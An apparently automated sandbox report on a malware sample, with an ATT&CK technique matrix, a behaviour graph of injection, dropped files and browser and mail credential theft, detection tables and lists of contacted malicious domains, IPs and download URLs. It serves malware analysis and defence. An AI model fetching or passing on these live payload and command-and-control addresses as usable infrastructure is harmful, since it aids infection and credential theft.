                          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                          Valid Accounts1Scripting1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools211OS Credential Dumping1System Time Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer15Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                          Default AccountsNative API541Valid Accounts1Valid Accounts1Deobfuscate/Decode Files or Information11Input Capture1Account Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel22Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                          Domain AccountsExploitation for Client Execution1Windows Service14Access Token Manipulation1Scripting1Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                          Local AccountsCommand and Scripting Interpreter3Logon Script (Mac)Windows Service14Obfuscated Files or Information3NTDSSystem Information Discovery228Distributed Component Object ModelInput Capture1Scheduled TransferNon-Application Layer Protocol5SIM Card SwapCarrier Billing Fraud
                          Cloud AccountsService Execution3Network Logon ScriptProcess Injection713Software Packing33LSA SecretsSecurity Software Discovery541SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol36Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                          Replication Through Removable MediaLaunchdRc.commonRc.commonTimestomp1Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncVirtualization/Sandbox Evasion331Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading131/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Valid Accounts1Network SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronAccess Token Manipulation1Input CaptureSystem Network Configuration Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                          Compromise Software Supply ChainUnix ShellLaunchdLaunchdVirtualization/Sandbox Evasion331KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                          Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled TaskProcess Injection713GUI Input CaptureDomain GroupsExploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement
                          Trusted RelationshipPythonHypervisorProcess InjectionHidden Files and Directories1Web Portal CaptureCloud GroupsAttack PC via USB ConnectionLocal Email CollectionStandard Application Layer ProtocolInternal ProxyInternal Defacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 552969 Sample: U3E7zMaux2.exe Startdate: 14/01/2022 Architecture: WINDOWS Score: 100 97 cdn.discordapp.com 2->97 99 185.215.113.35, 49901, 49902, 49904 WHOLESALECONNECTIONSNL Portugal 2->99 101 4 other IPs or domains 2->101 129 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->129 131 Multi AV Scanner detection for domain / URL 2->131 133 Antivirus detection for URL or domain 2->133 137 21 other signatures 2->137 11 U3E7zMaux2.exe 2->11         started        14 lagavljy.exe 2->14         started        16 uufaeea 2->16         started        18 5 other processes 2->18 signatures3 135 System process connects to network (likely due to code injection or exploit) 97->135 process4 signatures5 183 Contains functionality to inject code into remote processes 11->183 185 Injects a PE file into a foreign processes 11->185 20 U3E7zMaux2.exe 11->20         started        187 Detected unpacking (changes PE section rights) 14->187 189 Detected unpacking (overwrites its own PE header) 14->189 191 Writes to foreign memory regions 14->191 193 Allocates memory in foreign processes 14->193 23 svchost.exe 14->23         started        26 uufaeea 16->26         started        28 WerFault.exe 18->28         started        process6 dnsIp7 139 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 20->139 141 Maps a DLL or memory area into another process 20->141 143 Checks if the current machine is a virtual machine (disk enumeration) 20->143 30 explorer.exe 12 20->30 injected 103 microsoft-com.mail.protection.outlook.com 40.93.212.0, 25, 49829 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 23->103 105 patmushta.info 8.209.67.104, 443, 49844 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 23->105 145 System process connects to network (likely due to code injection or exploit) 23->145 147 Found API chain indicative of debugger detection 23->147 149 Creates a thread in another existing process (thread injection) 26->149 signatures8 process9 dnsIp10 115 185.233.81.115, 443, 49792 SUPERSERVERSDATACENTERRU Russian Federation 30->115 117 188.166.28.199, 80 DIGITALOCEAN-ASNUS Netherlands 30->117 119 13 other IPs or domains 30->119 89 C:\Users\user\AppData\Roaming\uufaeea, PE32 30->89 dropped 91 C:\Users\user\AppData\Local\Temp666.exe, PE32 30->91 dropped 93 C:\Users\user\AppData\Local\Temp\9A02.exe, PE32 30->93 dropped 95 11 other files (6 malicious) 30->95 dropped 121 System process connects to network (likely due to code injection or exploit) 30->121 123 Benign windows process drops PE files 30->123 125 Deletes itself after installation 30->125 127 Hides that the sample has been downloaded from the Internet (zone.identifier) 30->127 35 86C4.exe 2 30->35         started        39 7CA1.exe 30->39         started        41 7801.exe 30->41         started        44 3 other processes 30->44 file11 signatures12 process13 dnsIp14 75 C:\Users\user\AppData\Local\...\lagavljy.exe, PE32 35->75 dropped 151 Detected unpacking (changes PE section rights) 35->151 153 Detected unpacking (overwrites its own PE header) 35->153 155 Machine Learning detection for dropped file 35->155 171 3 other signatures 35->171 46 cmd.exe 35->46         started        49 cmd.exe 2 35->49         started        51 sc.exe 35->51         started        61 3 other processes 35->61 157 Found evasive API chain (may stop execution after checking mutex) 39->157 159 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 39->159 161 Found evasive API chain (may stop execution after checking computer name) 39->161 173 2 other signatures 39->173 109 185.163.204.24, 49916, 80 CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGE Germany 41->109 111 185.163.45.70, 80 MIVOCLOUDMD Moldova Republic of 41->111 113 185.163.204.22, 49914, 80 CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGE Germany 41->113 77 C:\Users\user\AppData\LocalLow\sqlite3.dll, PE32 41->77 dropped 79 C:\Users\user\AppData\...\vcruntime140.dll, PE32 41->79 dropped 81 C:\Users\user\AppData\...\ucrtbase.dll, PE32 41->81 dropped 85 14 other files (none is malicious) 41->85 dropped 163 Tries to steal Mail credentials (via file / registry access) 41->163 165 Tries to harvest and steal browser information (history, passwords, etc) 41->165 83 C:\Users\user\AppData\Local\...\8EC4.exe.log, ASCII 44->83 dropped 167 Antivirus detection for dropped file 44->167 169 Injects a PE file into a foreign processes 44->169 53 E666.exe 44->53         started        56 8EC4.exe 44->56         started        59 WerFault.exe 23 9 44->59         started        file15 signatures16 process17 dnsIp18 87 C:\Windows\SysWOW64\...\lagavljy.exe (copy), PE32 46->87 dropped 63 conhost.exe 46->63         started        65 conhost.exe 49->65         started        67 conhost.exe 51->67         started        175 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 53->175 177 Maps a DLL or memory area into another process 53->177 179 Checks if the current machine is a virtual machine (disk enumeration) 53->179 181 Creates a thread in another existing process (thread injection) 53->181 107 86.107.197.138, 38133, 49908 MOD-EUNL Romania 56->107 69 conhost.exe 61->69         started        71 conhost.exe 61->71         started        73 conhost.exe 61->73         started        file19 signatures20 process21

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          U3E7zMaux2.exe41%VirustotalBrowse
                          U3E7zMaux2.exe46%ReversingLabsWin32.Trojan.CrypterX
                          U3E7zMaux2.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\8EC4.exe100%AviraHEUR/AGEN.1211353
                          C:\Users\user\AppData\Local\Temp\7801.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\8EC4.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\8ED5.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\9A02.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\86C4.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\7CA1.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleHandler.dll0%MetadefenderBrowse
                          C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleHandler.dll0%ReversingLabs
                          C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleMarshal.dll0%MetadefenderBrowse
                          C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleMarshal.dll0%ReversingLabs
                          C:\Users\user\AppData\LocalLow\sG8rM8v\IA2Marshal.dll3%MetadefenderBrowse
                          C:\Users\user\AppData\LocalLow\sG8rM8v\IA2Marshal.dll0%ReversingLabs
                          C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy.dll0%MetadefenderBrowse
                          C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy.dll0%ReversingLabs
                          C:\Users\user\AppData\LocalLow\sG8rM8v\breakpadinjector.dll0%MetadefenderBrowse
                          C:\Users\user\AppData\LocalLow\sG8rM8v\breakpadinjector.dll0%ReversingLabs
                          C:\Users\user\AppData\LocalLow\sG8rM8v\freebl3.dll0%MetadefenderBrowse
                          C:\Users\user\AppData\LocalLow\sG8rM8v\freebl3.dll0%ReversingLabs
                          C:\Users\user\AppData\LocalLow\sG8rM8v\ldap60.dll0%MetadefenderBrowse
                          C:\Users\user\AppData\LocalLow\sG8rM8v\ldap60.dll2%ReversingLabs
                          C:\Users\user\AppData\LocalLow\sG8rM8v\ldif60.dll0%MetadefenderBrowse
                          C:\Users\user\AppData\LocalLow\sG8rM8v\ldif60.dll0%ReversingLabs

                          Unpacked PE Files

                          SourceDetectionScannerLabelLinkDownload
                          40.0.8EC4.exe.400000.10.unpack100%AviraHEUR/AGEN.1145065Download File
                          43.3.7801.exe.4d60000.2.unpack100%AviraTR/Crypt.EPACK.Gen2Download File
                          14.0.D984.exe.620e50.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          43.2.7801.exe.400000.0.unpack100%AviraHEUR/AGEN.1127993Download File
                          40.0.8EC4.exe.610000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                          21.2.86C4.exe.540e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                          14.0.D984.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          22.0.8EC4.exe.fa0000.2.unpack100%AviraHEUR/AGEN.1211353Download File
                          40.0.8EC4.exe.400000.6.unpack100%AviraHEUR/AGEN.1145065Download File
                          19.2.E666.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          40.0.8EC4.exe.400000.8.unpack100%AviraHEUR/AGEN.1145065Download File
                          21.3.86C4.exe.560000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                          40.0.8EC4.exe.610000.9.unpack100%AviraHEUR/AGEN.1211353Download File
                          12.0.uufaeea.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          1.2.U3E7zMaux2.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          40.2.8EC4.exe.610000.1.unpack100%AviraHEUR/AGEN.1211353Download File
                          19.0.E666.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          22.2.8EC4.exe.fa0000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                          36.2.lagavljy.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                          14.2.D984.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          19.0.E666.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          40.0.8EC4.exe.610000.2.unpack100%AviraHEUR/AGEN.1211353Download File
                          1.0.U3E7zMaux2.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          20.2.7CA1.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          12.0.uufaeea.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          40.0.8EC4.exe.610000.3.unpack100%AviraHEUR/AGEN.1211353Download File
                          22.0.8EC4.exe.fa0000.3.unpack100%AviraHEUR/AGEN.1211353Download File
                          1.1.U3E7zMaux2.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          40.0.8EC4.exe.610000.11.unpack100%AviraHEUR/AGEN.1211353Download File
                          19.1.E666.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          14.3.D984.exe.630000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          17.2.E666.exe.5415a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          20.2.7CA1.exe.570e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                          14.0.D984.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          40.0.8EC4.exe.610000.7.unpack100%AviraHEUR/AGEN.1211353Download File
                          19.0.E666.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          1.0.U3E7zMaux2.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          22.0.8EC4.exe.fa0000.1.unpack100%AviraHEUR/AGEN.1211353Download File
                          36.3.lagavljy.exe.490000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                          36.2.lagavljy.exe.650000.2.unpack100%AviraBDS/Backdoor.GenDownload File
                          14.2.D984.exe.620e50.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          40.0.8EC4.exe.610000.5.unpack100%AviraHEUR/AGEN.1211353Download File
                          40.0.8EC4.exe.400000.4.unpack100%AviraHEUR/AGEN.1145065Download File
                          12.1.uufaeea.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          40.2.8EC4.exe.400000.0.unpack100%AviraHEUR/AGEN.1145065Download File
                          39.2.svchost.exe.320000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                          40.0.8EC4.exe.610000.1.unpack100%AviraHEUR/AGEN.1211353Download File
                          22.0.8EC4.exe.fa0000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                          11.2.uufaeea.4615a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          21.2.86C4.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                          40.0.8EC4.exe.400000.12.unpack100%AviraHEUR/AGEN.1145065Download File
                          0.2.U3E7zMaux2.exe.5315a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          12.0.uufaeea.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          40.0.8EC4.exe.610000.13.unpack100%AviraHEUR/AGEN.1211353Download File
                          14.0.D984.exe.620e50.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          36.2.lagavljy.exe.470e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                          20.3.7CA1.exe.590000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                          1.0.U3E7zMaux2.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          12.2.uufaeea.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                          http://185.7.214.171:8080/6.php100%URL Reputationmalware
                          http://tempuri.org/0%URL Reputationsafe
                          http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                          http://185.215.113.35/d2VxjasuwS/index.php?scr=113%VirustotalBrowse
                          http://185.215.113.35/d2VxjasuwS/index.php?scr=10%Avira URL Cloudsafe
                          http://185.163.204.24/4%VirustotalBrowse
                          http://185.163.204.24/0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
                          https://api.ip.sb/ip0%URL Reputationsafe
                          http://tempuri.org/Entity/Id24Response0%URL Reputationsafe
                          http://data-host-coin-8.com/files/9030_1641816409_7037.exe16%VirustotalBrowse
                          http://data-host-coin-8.com/files/9030_1641816409_7037.exe100%Avira URL Cloudmalware
                          http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id8Response0%URL Reputationsafe
                          http://data-host-coin-8.com/game.exe0%URL Reputationsafe
                          http://tempuri.org/Entity/Id13Response0%URL Reputationsafe
                          http://185.163.204.24//l/f/S2zKVH4BZ2GIX1a3NFPE/870316542b6e8d6795384509412b3780ad4b1d320%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id22Response0%URL Reputationsafe
                          https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                          https://get.adob0%URL Reputationsafe
                          http://tempuri.org/Entity/Id18Response0%URL Reputationsafe
                          http://185.215.113.35/d2VxjasuwS/plugins/cred.dll100%Avira URL Cloudmalware
                          https://disneyplus.com/legal.0%URL Reputationsafe
                          http://tempuri.org/Entity/Id3Response0%URL Reputationsafe
                          http://service.r0%URL Reputationsafe

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          pool-fr.supportxmr.com
                          		91.121.140.167
                          		truefalse
                            		high
                            unicupload.top
                            		54.38.220.85
                            		truefalse
                              		high
                              host-data-coin-11.com
                              		93.189.42.167
                              		truefalse
                                		high
                                patmushta.info
                                		8.209.67.104
                                		truefalse
                                  		high
                                  cdn.discordapp.com
                                  		162.159.130.233
                                  		truefalse
                                    		high
                                    privacy-tools-for-you-780.com
                                    		93.189.42.167
                                    		truefalse
                                      		high
                                      microsoft-com.mail.protection.outlook.com
                                      		40.93.212.0
                                      		truefalse
                                        		high
                                        goo.su
                                        		104.21.38.221
                                        		truefalse
                                          		high
                                          transfer.sh
                                          		144.76.136.153
                                          		truefalse
                                            		high
                                            a0621298.xsph.ru
                                            		141.8.194.74
                                            		truefalse
                                              		high
                                              data-host-coin-8.com
                                              		93.189.42.167
                                              		truefalse
                                                		high
                                                pool.supportxmr.com
                                                		unknown
                                                		unknownfalse
                                                  		high

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://185.7.214.171:8080/6.phptrue
                                                  • URL Reputation: malware
                                                  		unknown
                                                  http://185.215.113.35/d2VxjasuwS/index.php?scr=1true
                                                  • 13%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://185.163.204.24/true
                                                  • 4%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://a0621298.xsph.ru/advert.msifalse
                                                    		high
                                                    http://a0621298.xsph.ru/9.exefalse
                                                      		high
                                                      http://data-host-coin-8.com/files/9030_1641816409_7037.exetrue
                                                      • 16%, Virustotal, Browse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://a0621298.xsph.ru/45512.exefalse
                                                        		high
                                                        http://data-host-coin-8.com/game.exefalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://a0621298.xsph.ru/File.exefalse
                                                          		high
                                                          http://a0621298.xsph.ru/443.exefalse
                                                            		high
                                                            http://185.163.204.24//l/f/S2zKVH4BZ2GIX1a3NFPE/870316542b6e8d6795384509412b3780ad4b1d32true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://185.215.113.35/d2VxjasuwS/plugins/cred.dlltrue
                                                            • Avira URL Cloud: malware
                                                            		unknown

                                                            URLs from Memory and Binaries

                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2005/02/sc/sct8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://duckduckgo.com/chrome_newtab8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://duckduckgo.com/ac/?q=8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://tempuri.org/Entity/Id12Response8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://tempuri.org/8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://tempuri.org/Entity/Id2Response8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha18EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        http://tempuri.org/Entity/Id21Response8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://support.google.com/chrome/?p=plugin_real8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/fault8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://tempuri.org/Entity/Id15Response8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  https://api.ip.sb/ip8EC4.exe, 00000016.00000002.828481056.0000000004401000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.923336327.0000000000402000.00000040.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA18EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://tempuri.org/Entity/Id24Response8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://schemas.xmlsoap.org/ws/2004/08/addressing8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              https://support.google.com/chrome/?p=plugin_shockwave8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://tempuri.org/Entity/Id5Response8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://tempuri.org/Entity/Id10Response8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
